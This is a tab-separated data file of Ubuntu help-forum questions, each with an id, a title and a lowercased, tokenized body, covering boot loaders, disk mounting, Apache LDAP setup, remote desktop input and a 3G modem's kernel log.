481893	about dbus-daemon 's activation parameter	i 'm using ubuntu12.04 lts . i saw following line in /etc/init.d/dbus.conf . exec dbus-daemon -- system -- fork -- activation=upstart and i saw the man page for dbus-daemon , and then found the -- activation=systemd parameter . i tried to use -- activation=systemd rather than -- activation=upstart . btw , system is good with this parameter . what differences are exist between the parameters ( -- activation=systemd and -- actication=upstart ) .
481895	grub loader cant boot into windows 8	so , i just installed ubuntu 14.04 onto a lenovo u510 . however , i ca n't boot into the windows partition from grub . whenever i load to grub , it says : /endentire file path : /acpi ( ... error : can not load image . press any key to continue . i tried the boot repair , but it just removed the windows boot manager option from grub . i can still boot to windows through uefi but i would like to be able to choose at the start up . is there anyway to fix this ?
481896	ca n't play wma , wmv or 3gp files	since i installed ubuntu 14.04 i can no longer play wmv , wma or 3gp files with any player ( gxine - vlc - totem - etc . ) i have installed ubuntu restricted extras and ffmpeg . my friends , i found the solution , and the solution is remove all gstreamer packages , then reinstall it .
481897	unity desktop shortcuts display path to file	i 'm using unity on ubuntu 12.04 and something odd has happened to my desktop . at some point all the icons for all the files on my desktop began to display their path beneath the file name . this is no show stopper but it is visually distracting , and clearly incorrect . for example the file to_do.txt will show : ( little graphic ) to_do.txt /home/geoff/desktop what setting would control that ? i 've poked about a fair bit in myunity and gconf and not had any luck with finding a setting that looks right . any suggestions about what might set this straight ?
481898	ca n't automatically mount ext4 partitions under ubuntu 14.04 ( but can mount ntfs ones )	so i just got alongside my windows 8.1 a cool ubuntu 14.04 and quite happy with it ( my default os now ) . i just have a problem : the fact that i ca n't mount ext4 partitions at boot is quite annoying . i have the following setup : 1x intel ssd with 3 partitions : the root ext4 ( ubuntu install point ) , a ntfs one ( where the win 8.1 lives ) and the swap . everything on this disk mounts at startup by default , without problems ( the root mounts , obviously , swap works , and the ntfs automatically mounts and shows up in nautilus ) . i also have other 2 hdd disks . both have one ext4 partition and one ntfs . i tried making them mount at startup using the disks app . i made identical settings to all of them , the ntfs ones mount , the ext4 give an error . i 'll explain with screenshots : this is how the default automount for my root ext4 looks ( and perfectly works ) . this is how i set up the ntfs partitions , that perfectly auto mount : and this is how i am trying to set up my ext4 partitions to mount at startup : by default , the mount setup for non-boot ext4 's looks like this : i try setting it up like this : ok for now , ... it asks for password : now it looks like everything worked : but the partition will not mount . if i restart my pc or i try to use the ext4 partition set to automount , i get : and i am unable to use my partitions until i go to disks and set them to automatic mount options again . also , if i set up and restart without remounting , before i get to my desktop , i get that error on the last screenshot with the `` bad superblock '' . i know this question has been asked , but no one had the exact problem as me , and some say it is impossible to fix ? i do n't believe that . on my server i setup automount with fstab . i can do this here , but i need to keep the exact labels and mountpoints because i have some path dependent applications like deluge . thanks .
481899	how can i remove ubuntu record from my boot list ?	i 've installed ubuntu 12.04 on an external usb3.0 drive . i selected sdb ( the usb stick ) as grub point and created a new ext4 partition as root on sdb1 . everything went very well and i could either boot windows 8.1 or ubuntu ( of course only if the usb stick was plugged ) . i noticed that on my bios efi menu i had 3 records : windows boot manager ubuntu ubuntu ubuntu is the /efi/ubuntu/grubx64.efi whereas ubuntu is /efi/ubuntu/shimx64.efi ( i guess because i had the security bot enabled and i needed the shimx64 as `` bridge '' ) . here comes the problem.. i 've formatted the pen drive and i now want to remove the two ubuntu records . i do n't want any trace of them into my system . i tried using efibootmgr sudo efibootmgr -b # record -b but i was only able to remove the shimx64 ( ubuntu ) whereas the other ( ubuntu ) is still there and re-appears everytime i reboot the system . i 've also tried both easyuefi for windows and the tool inside the bios ( dell m3800 ) but it is the same ( i can delete it and it appears again ) . description : ubuntu gpt partition guid : { 384aad4c-d1fd-46cb-844b-f665289c1cbf } partition number:1 partition starting sector:2048 partition ending sector:1026047 file path : \efi\ubuntu\grubx64.efi what should i do ? ( please consider that i am quite new with ubuntu ) my problem is similar to this one but i can not fix it . many thanks in advance .
481904	making sense of rsyslogd rules	first : i 'm using ubuntu server linux - 3.13.0-29-generic # 53-ubuntu smp wed jun 4 21:00:20 utc 2014 x86_64 x86_64 x86_64 gnu/linux with rsyslogd 7.4.4 i would very much like to make sense of the contents of /etc/rsyslog.d/50-default.conf in the hopes of one day creating some custom rules for myself to redirect some of the messages to other logfiles . could someone please point me to a beginner 's tutorial or something ? what i 've already tried ( and did n't give me the info i need ) : man rsyslogd man rsyslog.conf ubuntu 's rsyslog documentation . lots of info there , but not what i was looking for . various pages on rsyslog.com do mention some of the default rules , but offer insufficient explanation of the syntax . apparently , there is a new syntax now which seems to be documented better ( i have n't looked at it in detail yet ) , but that 's not what i 'm looking for . as far as i can find out i 'm really trying to find out about the `` old '' syntax . any suggestions what i should be looking for/at are welcome .
481906	what does `` tty '' stand for ?	on the wikipedia 's article ( computer terminal ) under the hard copy terminals section of the article it says this `` early user terminals connected to computers were electromechanical teleprinters or teletypewriters ( teletypewriter , tty ) ... '' so does tty stand for teletypewriters ? but it does n't make any sense for me because i have never seen it and have no idea what `` tele '' means .
481908	problems with my laptop when i turn machine	i 've recently connect my laptop on another place in my house . when my laptop is booting , i saw this message : i915_bdw : exports duplicate symbol i915_release_power_well ( owned by i915 ) hda_intel error request power well i915 in some opportunities , when i suspend the machine for some instant of time , the machine is blocked or do n't let me work and i should turn off my laptop with the shutdown button . is possible that my problem is of the power or energy in the place in where i connect my laptop , but too i want share this problem with you for i have more trial elements about it . thanks : )
481909	how do i add c++ source and header files to ubuntusdk project ?	i am trying to add some c++ code to an ubuntu sdk project which is ( gui ) based in qml . unfortunately i ca n't seem to understand how i am supposed to do this . usually qtcreator allows me to right click on my project an just add a new c++ class . the ubuntu sdk does not have this functionality or at least i ca n't find it . help would be greatly appreciated .
481910	compiz - change magic lamp minimize direction to be from the side of the window	the ( non-wavy ) magic lamp effect looks great , however , it always starts the animation from the top of bottom of the window making it minimize up or down and towards the launcher . is it possible for the animation to start from say the left of the window instead ? to use simple words , rotate the animation effect 90 degrees ? just like the genie effect in osx , but sucking it into the launcher from the side of the window instead . kind of like looking like this ; without rotating the screen/desktop of course . : ) i 've been looking through configuration files and animation.xml and have n't found anything related to it yet . i 'm thinking i 'll have to dive into source . if anyone knows if this could be done or where i should start in the code it would be really helpful ! for reference i 'm running 12.04 lts 64-bit unity desktop . does any of this make sense to you ?
481912	how to find from which folder my pc is taking regular backup via rsnapshot	we are taking daily incremental backup from our main office in new jersy.for that we are using rsnapshot & we have generated authentication key so that we do n't need any daily password authentication . now my question is how can i know from which folder it is taking daily backup to my pc . p.s : i am using ubuntu 12.04 lts 32-bit please give me direct & simple answer because i am new for ubuntu
481914	about chrubuntu	i have intalled ubuntu on my chromebook but it boots to chrome os when i boot and i tried the commands below and this is the message i get : chronos @ localhost / $ sudo cgpt add -i 6 -p 5 -s 1 /dev/sda error : cgpt add : ca n't open /dev/sda : no such file or directoryd how can i do this and get it to work ?
481917	apache ( 2.4.7 ) ldap url authentication on ubuntu 14.04	the following ldap url authentication is not working for mediawiki on ubuntu 14.04 lts server , which is working on ubuntu 9.10 server . cat /etc/apache2/sites-available/global.conf < directory /mediawiki > options +followsymlinks allowoverride all order allow , deny allow from all authtype basic authname `` web site authentication : login with your user id '' authbasicprovider ldap # authzldapauthoritative on authldapurl `` ldap : //192.168.1.3:389/dc=mydomain , dc=net ? uid '' authldapbinddn `` cn=admin , dc=mydomain , dc=net '' authldapbindpassword secret require valid-user < /directory > not working in the sense it 's not prompting for authentication at all , just allows to access . no errors . there are many changes in ubuntu 14.04 , such as web root directory changed to /var/www/html in apache 2.4 , authzldapauthoritative is deprecated ( that 's why commented ) ... . if i paste the same code in 000-defaults replacing /mediawiki with /var/www/html then it prompts for authentication for accessing http : //192.168.1.3 . but no effect for http : //192.168.1.3/mediawiki am i missing anything in apache 2.4.7 ? . i 'm confused , anybody has any idea ?
481921	ubuntu installation does not start	i am trying to install ubuntu on my old laptop ( celeron 1.7 , 1mb ram ) from a cd/dvd . i downloaded an older distribution with no pae ( i have already tried 9.04 and 10.4 ) . both downloads freeze when i start the very first step of the installation - when i click on install ubuntu /install ubuntu desktop ( whatever is after the language selection ) - installation just freezes with dash/underscore on the screen . i have already done the checksum for both downloads ( they are ok ) , performed the memory test ( it is also ok ) . disk check freezes the system too , but i dbl checked the hdd on another ubuntu pc and it returned no errors . installation also freezes at the same stage when i completely remove hdd ... what could possibly be wrong and any solution to this ? thanks ! yes , thank you the memory is 1gb !
481923	ca n't resize windows in ubuntu 14.04	in my freshly installed ubuntu 14.04 ( with unity ) i can not resize any window . minimizing and maximizing works fine , but non-full screen applications are stuck to a default size . moving the cursor to the window edges turns it into resizing arrows , but clicking and dragging yields no result . i am on a thinkpad x1 , dualboot with windows 7 . intel hd 4000 graphics card . there is no file /etc/x11/xorg/conf . any suggestions ?
481924	deamon openvpn configuration file with .conf ?	in the video connected to a linux to another linux via ssh , the second openvpn daemon already startado and configured with user/password requested at the entrance . http : //youtu.be/tsnce6j2zxm how do i configure openvpn daemon to get it already startado and configured with user / password automatically ? what are the directories to move ? commands ?
481926	copy the windows 7 files to ubuntu 14.04	i was working in the windows 7 os previously , now i shifted to the ubuntu 14.04 version . i had important file on d & & e drive of windows 7 which i could n't take backup . how to recover those data in ubutnu ? ( i had choose the only ubuntu option while installing the ubuntu )
481928	mysql takes ages to load ( only when using wp )	i 'm not sure what 's happening but it 's since a while that i 'm experiencing using my dev site ( running on a vm ) on the local ubuntu machine . the site runs on a wordpress instance using mysql setup to use innodb table on a separate folder . i do n't have permission problems , as far as i know . it i try to use mysql cli i can query the database without problems ; the same using phpmyadmin . but when it comes to access via the site it takes ages and more often than not i need to stop the service . and that 's again another symptom something does n't work as it should . stopping the service via sudo service mysql stop i can see it immediately stops ( phpmyadmin ca n't log in anymore ) but the command line prompt keep on hold like it is working . the only way i have to get the cli ready is to brutally stop the service with a ctrl+c . any idea of what 's wrong ? thanks
481929	why is left click and typing not working when remoting into ubuntu 14.04 with teamviewer ?	it works fine for an unknown period of time , but then the left click fails to activate and only `` grabs '' and typing fails entirely . what could be the issue ? the remote machine is totally headless . would it possibly work better if a mouse and/or keyboard were attached ? when i run xinput -list i get the following result : virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ power button id=7 [ slave keyboard ( 3 ) ] maybe the virtual pointer is the problem ?
481933	brightness not changing dell 15r se and ubuntu 12.04	with my current laptop i ca n't change my brightness anymore i tried xbacklight -set 50 ( nothing happened ) and also changed this line grub_cmdline_linux_default= `` quiet splash '' to grub_cmdline_linux_default= `` quiet splash acpi_backlight=vendor '' and updated the grub but still it did n't solve the problem . is there a solution to this ?
481934	bsnl 3g data card not connecting in 13.10. it says , `` disconnected , you are offline ''	my bsnl 3g data-card is detected but i am unable to connect to network . i am a beginner and so my humble request to dear friends if they can explain as to what to be done in layman 's language . the output of some commands run is attached . $ lsusb bus 002 device 003 : id 0bda:5603 realtek semiconductor corp . bus 002 device 012 : id 12d1:1506 huawei technologies co. , ltd. e398 lte/umts/gsm modem/networkcard bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub $ nm-tool**** networkmanager tool state : disconnected - device : ttyusb0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : mobile broadband ( gsm ) driver : option1 state : disconnected default : no capabilities : - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : alx state : unavailable default : no hw address : bc : ee:7b : bb:12 : b3 capabilities : carrier detect : yes wired properties carrier : off - device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : rt2800pci state : disconnected default : no hw address : 34:23:87:70 : d1 : d3 capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points when i ran dmseg i got a 10 page output but i am only attaching what i think should be related . [ 62.901908 ] usb 2-1.3 : new high-speed usb device number 4 using ehci-pci [ 62.995100 ] usb 2-1.3 : new usb device found , idvendor=12d1 , idproduct=14fe [ 62.995112 ] usb 2-1.3 : new usb device strings : mfr=2 , product=1 , serialnumber=0 [ 62.995118 ] usb 2-1.3 : product : huawei mobile [ 62.995122 ] usb 2-1.3 : manufacturer : huawei [ 63.071606 ] usb-storage 2-1.3:1.0 : usb mass storage device detected [ 63.071758 ] scsi4 : usb-storage 2-1.3:1.0 [ 63.071919 ] usb-storage 2-1.3:1.1 : usb mass storage device detected [ 63.072058 ] scsi5 : usb-storage 2-1.3:1.1 [ 63.072187 ] usbcore : registered new interface driver usb-storage [ 64.070286 ] scsi 5:0:0:0 : direct-access huawei sd storage 2.31 pq : 0 ansi : 2 [ 64.070293 ] scsi 4:0:0:0 : cd-rom huawei mass storage 2.31 pq : 0 ansi : 2 [ 64.073836 ] sd 5:0:0:0 : attached scsi generic sg1 type 0 [ 64.074650 ] sd 5:0:0:0 : [ sdb ] attached scsi removable disk [ 64.080764 ] sr0 : scsi-1 drive [ 64.080774 ] cdrom : uniform cd-rom driver revision : 3.20 [ 64.081007 ] sr 4:0:0:0 : attached scsi cd-rom sr0 [ 64.081134 ] sr 4:0:0:0 : attached scsi generic sg2 type 5 [ 118.069805 ] usb 2-1.3 : usb disconnect , device number 4 [ 133.003638 ] usb 2-1.3 : new high-speed usb device number 5 using ehci-pci [ 133.096841 ] usb 2-1.3 : new usb device found , idvendor=12d1 , idproduct=14fe [ 133.096852 ] usb 2-1.3 : new usb device strings : mfr=2 , product=1 , serialnumber=0 [ 133.096857 ] usb 2-1.3 : product : huawei mobile [ 133.096862 ] usb 2-1.3 : manufacturer : huawei [ 133.098711 ] usb-storage 2-1.3:1.0 : usb mass storage device detected [ 133.099038 ] scsi6 : usb-storage 2-1.3:1.0 [ 133.099338 ] usb-storage 2-1.3:1.1 : usb mass storage device detected [ 133.099730 ] scsi7 : usb-storage 2-1.3:1.1 [ 134.096070 ] scsi 6:0:0:0 : cd-rom huawei mass storage 2.31 pq : 0 ansi : 2 [ 134.101995 ] scsi 7:0:0:0 : direct-access huawei sd storage 2.31 pq : 0 ansi : 2 [ 134.103299 ] sr0 : scsi-1 drive [ 134.104167 ] sr 6:0:0:0 : attached scsi cd-rom sr0 [ 134.104322 ] sr 6:0:0:0 : attached scsi generic sg1 type 5 [ 134.106786 ] sd 7:0:0:0 : attached scsi generic sg2 type 0 [ 134.108999 ] sd 7:0:0:0 : [ sdb ] attached scsi removable disk [ 134.768902 ] usb 2-1.3 : usb disconnect , device number 5 [ 146.483230 ] usb 2-1.3 : new high-speed usb device number 6 using ehci-pci [ 146.576625 ] usb 2-1.3 : new usb device found , idvendor=12d1 , idproduct=1506 [ 146.576637 ] usb 2-1.3 : new usb device strings : mfr=3 , product=2 , serialnumber=0 [ 146.576642 ] usb 2-1.3 : product : huawei mobile [ 146.576647 ] usb 2-1.3 : manufacturer : huawei [ 146.578940 ] usb-storage 2-1.3:1.4 : usb mass storage device detected [ 146.579427 ] scsi8 : usb-storage 2-1.3:1.4 [ 146.579653 ] usb-storage 2-1.3:1.5 : usb mass storage device detected [ 146.579775 ] scsi9 : usb-storage 2-1.3:1.5 [ 146.650592 ] usbcore : registered new interface driver usbserial [ 146.650630 ] usbcore : registered new interface driver usbserial_generic [ 146.650655 ] usbserial : usb serial support registered for generic [ 146.686705 ] usbcore : registered new interface driver option [ 146.687661 ] usbserial : usb serial support registered for gsm modem ( 1-port ) [ 146.688354 ] option 2-1.3:1.0 : gsm modem ( 1-port ) converter detected [ 146.688792 ] usb 2-1.3 : gsm modem ( 1-port ) converter now attached to ttyusb0 [ 146.688861 ] option 2-1.3:1.2 : gsm modem ( 1-port ) converter detected [ 146.689091 ] usb 2-1.3 : gsm modem ( 1-port ) converter now attached to ttyusb1 [ 146.689131 ] option 2-1.3:1.3 : gsm modem ( 1-port ) converter detected [ 146.689348 ] usb 2-1.3 : gsm modem ( 1-port ) converter now attached to ttyusb2 [ 146.717742 ] usb 2-1.3 : mac-address : 58:2c:80:13:92:63 [ 146.718336 ] cdc_ncm 2-1.3:1.1 wwan0 : register 'cdc_ncm ' at usb-0000:00:1d.0-1.3 , mobile broadband network device , 58:2c:80:13:92:63 [ 146.719282 ] usbcore : registered new interface driver cdc_ncm [ 147.579581 ] scsi 8:0:0:0 : cd-rom huawei mass storage 2.31 pq : 0 ansi : 2 [ 147.579699 ] scsi 9:0:0:0 : direct-access huawei sd storage 2.31 pq : 0 ansi : 2 [ 147.583968 ] sr0 : scsi-1 drive [ 147.584197 ] sr 8:0:0:0 : attached scsi cd-rom sr0 [ 147.584357 ] sr 8:0:0:0 : attached scsi generic sg1 type 5 [ 147.584700 ] sd 9:0:0:0 : attached scsi generic sg2 type 0 [ 147.586479 ] sd 9:0:0:0 : [ sdb ] attached scsi removable disk [ 159.336646 ] usb 2-1.3 : usb disconnect , device number 6 [ 159.338935 ] option1 ttyusb0 : option_instat_callback : error -108 [ 159.339302 ] option1 ttyusb0 : gsm modem ( 1-port ) converter now disconnected from ttyusb0 [ 159.339352 ] option 2-1.3:1.0 : device disconnected [ 159.339520 ] cdc_ncm 2-1.3:1.1 wwan0 : unregister 'cdc_ncm ' usb-0000:00:1d.0-1.3 , mobile broadband network device [ 159.340007 ] option1 ttyusb1 : usb_wwan_indat_callback : resubmit read urb failed . ( -19 ) [ 159.344253 ] option1 ttyusb1 : usb_wwan_indat_callback : resubmit read urb failed . ( -19 ) [ 159.348500 ] option1 ttyusb1 : usb_wwan_indat_callback : resubmit read urb failed . ( -19 ) [ 159.352748 ] option1 ttyusb1 : usb_wwan_indat_callback : resubmit read urb failed . ( -19 ) [ 159.366105 ] option1 ttyusb1 : gsm modem ( 1-port ) converter now disconnected from ttyusb1 [ 159.366142 ] option 2-1.3:1.2 : device disconnected [ 159.366637 ] option1 ttyusb2 : gsm modem ( 1-port ) converter now disconnected from ttyusb2 [ 159.366664 ] option 2-1.3:1.3 : device disconnected [ 178.169164 ] usb 2-1.3 : new high-speed usb device number 7 using ehci-pci [ 178.262630 ] usb 2-1.3 : new usb device found , idvendor=12d1 , idproduct=14fe [ 178.262642 ] usb 2-1.3 : new usb device strings : mfr=2 , product=1 , serialnumber=0 [ 178.262648 ] usb 2-1.3 : product : huawei mobile [ 178.262652 ] usb 2-1.3 : manufacturer : huawei [ 178.264495 ] usb-storage 2-1.3:1.0 : usb mass storage device detected [ 178.264797 ] scsi10 : usb-storage 2-1.3:1.0 [ 178.265065 ] usb-storage 2-1.3:1.1 : usb mass storage device detected [ 178.265169 ] scsi11 : usb-storage 2-1.3:1.1 [ 179.265932 ] scsi 11:0:0:0 : direct-access huawei sd storage 2.31 pq : 0 ansi : 2 [ 179.265939 ] scsi 10:0:0:0 : cd-rom huawei mass storage 2.31 pq : 0 ansi : 2 [ 179.266774 ] sd 11:0:0:0 : attached scsi generic sg1 type 0 [ 179.269261 ] sd 11:0:0:0 : [ sdb ] attached scsi removable disk [ 179.276924 ] sr0 : scsi-1 drive [ 179.277275 ] sr 10:0:0:0 : attached scsi cd-rom sr0 [ 179.277759 ] sr 10:0:0:0 : attached scsi generic sg2 type 5 [ 179.652643 ] usb 2-1.3 : usb disconnect , device number 7 [ 191.624925 ] usb 2-1.3 : new high-speed usb device number 8 using ehci-pci [ 191.718633 ] usb 2-1.3 : new usb device found , idvendor=12d1 , idproduct=1506 [ 191.718645 ] usb 2-1.3 : new usb device strings : mfr=3 , product=2 , serialnumber=0 [ 191.718651 ] usb 2-1.3 : product : huawei mobile [ 191.718656 ] usb 2-1.3 : manufacturer : huawei [ 191.720667 ] option 2-1.3:1.0 : gsm modem ( 1-port ) converter detected [ 191.720922 ] usb 2-1.3 : gsm modem ( 1-port ) converter now attached to ttyusb0 [ 191.723465 ] usb 2-1.3 : mac-address : 58:2c:80:13:92:63 [ 191.723820 ] cdc_ncm 2-1.3:1.1 wwan0 : register 'cdc_ncm ' at usb-0000:00:1d.0-1.3 , mobile broadband network device , 58:2c:80:13:92:63 [ 191.723923 ] option 2-1.3:1.2 : gsm modem ( 1-port ) converter detected [ 191.724267 ] usb 2-1.3 : gsm modem ( 1-port ) converter now attached to ttyusb1 [ 191.724401 ] option 2-1.3:1.3 : gsm modem ( 1-port ) converter detected [ 191.724522 ] usb 2-1.3 : gsm modem ( 1-port ) converter now attached to ttyusb2 [ 191.724676 ] usb-storage 2-1.3:1.4 : usb mass storage device detected [ 191.725171 ] scsi12 : usb-storage 2-1.3:1.4 [ 191.725393 ] usb-storage 2-1.3:1.5 : usb mass storage device detected [ 191.725480 ] scsi13 : usb-storage 2-1.3:1.5 [ 192.725217 ] scsi 13:0:0:0 : direct-access huawei sd storage 2.31 pq : 0 ansi : 2 [ 192.725327 ] scsi 12:0:0:0 : cd-rom huawei mass storage 2.31 pq : 0 ansi : 2 [ 192.727868 ] sr0 : scsi-1 drive [ 192.728092 ] sr 12:0:0:0 : attached scsi cd-rom sr0 [ 192.728247 ] sr 12:0:0:0 : attached scsi generic sg1 type 5 [ 192.729814 ] sd 13:0:0:0 : attached scsi generic sg2 type 0 [ 192.732763 ] sd 13:0:0:0 : [ sdb ] attached scsi removable disk [ 222.646675 ] usb 2-1.3 : usb disconnect , device number 8 [ 222.649050 ] option1 ttyusb0 : option_instat_callback : error -108 [ 222.649356 ] option1 ttyusb0 : gsm modem ( 1-port ) converter now disconnected from ttyusb0 [ 222.649405 ] option 2-1.3:1.0 : device disconnected [ 222.649574 ] cdc_ncm 2-1.3:1.1 wwan0 : unregister 'cdc_ncm ' usb-0000:00:1d.0-1.3 , mobile broadband network device [ 222.690582 ] option1 ttyusb1 : gsm modem ( 1-port ) converter now disconnected from ttyusb1 [ 222.690617 ] option 2-1.3:1.2 : device disconnected [ 222.691159 ] option1 ttyusb2 : gsm modem ( 1-port ) converter now disconnected from ttyusb2 [ 222.691185 ] option 2-1.3:1.3 : device disconnected [ 244.612096 ] usb 2-1.3 : new high-speed usb device number 9 using ehci-pci [ 244.705429 ] usb 2-1.3 : new usb device found , idvendor=12d1 , idproduct=14fe [ 244.705441 ] usb 2-1.3 : new usb device strings : mfr=2 , product=1 , serialnumber=0 [ 244.705446 ] usb 2-1.3 : product : huawei mobile [ 244.705451 ] usb 2-1.3 : manufacturer : huawei [ 244.707288 ] usb-storage 2-1.3:1.0 : usb mass storage device detected [ 244.707685 ] scsi14 : usb-storage 2-1.3:1.0 [ 244.707973 ] usb-storage 2-1.3:1.1 : usb mass storage device detected [ 244.708255 ] scsi15 : usb-storage 2-1.3:1.1 [ 245.708668 ] scsi 15:0:0:0 : direct-access huawei sd storage 2.31 pq : 0 ansi : 2 [ 245.708700 ] scsi 14:0:0:0 : cd-rom huawei mass storage 2.31 pq : 0 ansi : 2 [ 245.709507 ] sd 15:0:0:0 : attached scsi generic sg1 type 0 [ 245.711061 ] sd 15:0:0:0 : [ sdb ] attached scsi removable disk [ 245.711970 ] sr0 : scsi-1 drive [ 245.712232 ] sr 14:0:0:0 : attached scsi cd-rom sr0 [ 245.712390 ] sr 14:0:0:0 : attached scsi generic sg2 type 5 [ 245.982363 ] usb 2-1.3 : usb disconnect , device number 9 [ 257.951904 ] usb 2-1.3 : new high-speed usb device number 10 using ehci-pci [ 258.045488 ] usb 2-1.3 : new usb device found , idvendor=12d1 , idproduct=1506 [ 258.045500 ] usb 2-1.3 : new usb device strings : mfr=3 , product=2 , serialnumber=0 [ 258.045505 ] usb 2-1.3 : product : huawei mobile [ 258.045510 ] usb 2-1.3 : manufacturer : huawei [ 258.047471 ] option 2-1.3:1.0 : gsm modem ( 1-port ) converter detected [ 258.047706 ] usb 2-1.3 : gsm modem ( 1-port ) converter now attached to ttyusb0 [ 258.050326 ] usb 2-1.3 : mac-address : 58:2c:80:13:92:63 [ 258.050877 ] cdc_ncm 2-1.3:1.1 wwan0 : register 'cdc_ncm ' at usb-0000:00:1d.0-1.3 , mobile broadband network device , 58:2c:80:13:92:63 [ 258.051002 ] option 2-1.3:1.2 : gsm modem ( 1-port ) converter detected [ 258.051169 ] usb 2-1.3 : gsm modem ( 1-port ) converter now attached to ttyusb1 [ 258.051317 ] option 2-1.3:1.3 : gsm modem ( 1-port ) converter detected [ 258.051438 ] usb 2-1.3 : gsm modem ( 1-port ) converter now attached to ttyusb2 [ 258.051596 ] usb-storage 2-1.3:1.4 : usb mass storage device detected [ 258.052191 ] scsi16 : usb-storage 2-1.3:1.4 [ 258.052405 ] usb-storage 2-1.3:1.5 : usb mass storage device detected [ 258.052483 ] scsi17 : usb-storage 2-1.3:1.5 [ 259.052126 ] scsi 17:0:0:0 : direct-access huawei sd storage 2.31 pq : 0 ansi : 2 [ 259.052230 ] scsi 16:0:0:0 : cd-rom huawei mass storage 2.31 pq : 0 ansi : 2 [ 259.052975 ] sd 17:0:0:0 : attached scsi generic sg1 type 0 [ 259.057234 ] sd 17:0:0:0 : [ sdb ] attached scsi removable disk [ 259.057776 ] sr0 : scsi-1 drive [ 259.058002 ] sr 16:0:0:0 : attached scsi cd-rom sr0 [ 259.058168 ] sr 16:0:0:0 : attached scsi generic sg2 type 5 [ 656.472467 ] usb 2-1.3 : usb disconnect , device number 10 [ 656.474748 ] option1 ttyusb0 : option_instat_callback : error -108 [ 656.474956 ] option1 ttyusb0 : gsm modem ( 1-port ) converter now disconnected from ttyusb0 [ 656.474977 ] option 2-1.3:1.0 : device disconnected [ 656.475061 ] cdc_ncm 2-1.3:1.1 wwan0 : unregister 'cdc_ncm ' usb-0000:00:1d.0-1.3 , mobile broadband network device [ 656.476448 ] option1 ttyusb2 : usb_wwan_indat_callback : resubmit read urb failed . ( -19 ) [ 656.478571 ] option1 ttyusb2 : usb_wwan_indat_callback : resubmit read urb failed . ( -19 ) [ 656.480448 ] option1 ttyusb2 : usb_wwan_indat_callback : resubmit read urb failed . ( -19 ) [ 656.480693 ] option1 ttyusb2 : usb_wwan_indat_callback : resubmit read urb failed . ( -19 ) [ 656.506021 ] option1 ttyusb1 : gsm modem ( 1-port ) converter now disconnected from ttyusb1 [ 656.506041 ] option 2-1.3:1.2 : device disconnected [ 656.507544 ] option1 ttyusb2 : gsm modem ( 1-port ) converter now disconnected from ttyusb2 [ 656.507563 ] option 2-1.3:1.3 : device disconnected [ 682.224905 ] usb 2-1.3 : new high-speed usb device number 11 using ehci-pci [ 682.318248 ] usb 2-1.3 : new usb device found , idvendor=12d1 , idproduct=14fe [ 682.318260 ] usb 2-1.3 : new usb device strings : mfr=2 , product=1 , serialnumber=0 [ 682.318266 ] usb 2-1.3 : product : huawei mobile [ 682.318270 ] usb 2-1.3 : manufacturer : huawei [ 682.320130 ] usb-storage 2-1.3:1.0 : usb mass storage device detected [ 682.320645 ] scsi18 : usb-storage 2-1.3:1.0 [ 682.320890 ] usb-storage 2-1.3:1.1 : usb mass storage device detected [ 682.321323 ] scsi19 : usb-storage 2-1.3:1.1 [ 683.321458 ] scsi 19:0:0:0 : direct-access huawei sd storage 2.31 pq : 0 ansi : 2 [ 683.321465 ] scsi 18:0:0:0 : cd-rom huawei mass storage 2.31 pq : 0 ansi : 2 [ 683.322206 ] sd 19:0:0:0 : attached scsi generic sg1 type 0 [ 683.327373 ] sd 19:0:0:0 : [ sdb ] attached scsi removable disk [ 683.328188 ] sr0 : scsi-1 drive [ 683.328667 ] sr 18:0:0:0 : attached scsi cd-rom sr0 [ 683.329234 ] sr 18:0:0:0 : attached scsi generic sg2 type 5 [ 683.601831 ] usb 2-1.3 : usb disconnect , device number 11 [ 695.572698 ] usb 2-1.3 : new high-speed usb device number 12 using ehci-pci [ 695.666186 ] usb 2-1.3 : new usb device found , idvendor=12d1 , idproduct=1506 [ 695.666198 ] usb 2-1.3 : new usb device strings : mfr=3 , product=2 , serialnumber=0 [ 695.666203 ] usb 2-1.3 : product : huawei mobile [ 695.666208 ] usb 2-1.3 : manufacturer : huawei [ 695.668163 ] option 2-1.3:1.0 : gsm modem ( 1-port ) converter detected [ 695.668567 ] usb 2-1.3 : gsm modem ( 1-port ) converter now attached to ttyusb0 [ 695.671017 ] usb 2-1.3 : mac-address : 58:2c:80:13:92:63 [ 695.671373 ] cdc_ncm 2-1.3:1.1 wwan0 : register 'cdc_ncm ' at usb-0000:00:1d.0-1.3 , mobile broadband network device , 58:2c:80:13:92:63 [ 695.671481 ] option 2-1.3:1.2 : gsm modem ( 1-port ) converter detected [ 695.671851 ] usb 2-1.3 : gsm modem ( 1-port ) converter now attached to ttyusb1 [ 695.671990 ] option 2-1.3:1.3 : gsm modem ( 1-port ) converter detected [ 695.672108 ] usb 2-1.3 : gsm modem ( 1-port ) converter now attached to ttyusb2 [ 695.672220 ] usb-storage 2-1.3:1.4 : usb mass storage device detected [ 695.672369 ] scsi20 : usb-storage 2-1.3:1.4 [ 695.672579 ] usb-storage 2-1.3:1.5 : usb mass storage device detected [ 695.673132 ] scsi21 : usb-storage 2-1.3:1.5 [ 696.672914 ] scsi 20:0:0:0 : cd-rom huawei mass storage 2.31 pq : 0 ansi : 2 [ 696.675545 ] scsi 21:0:0:0 : direct-access huawei sd storage 2.31 pq : 0 ansi : 2 i have been struggling with this for 2 days now . kindly help .
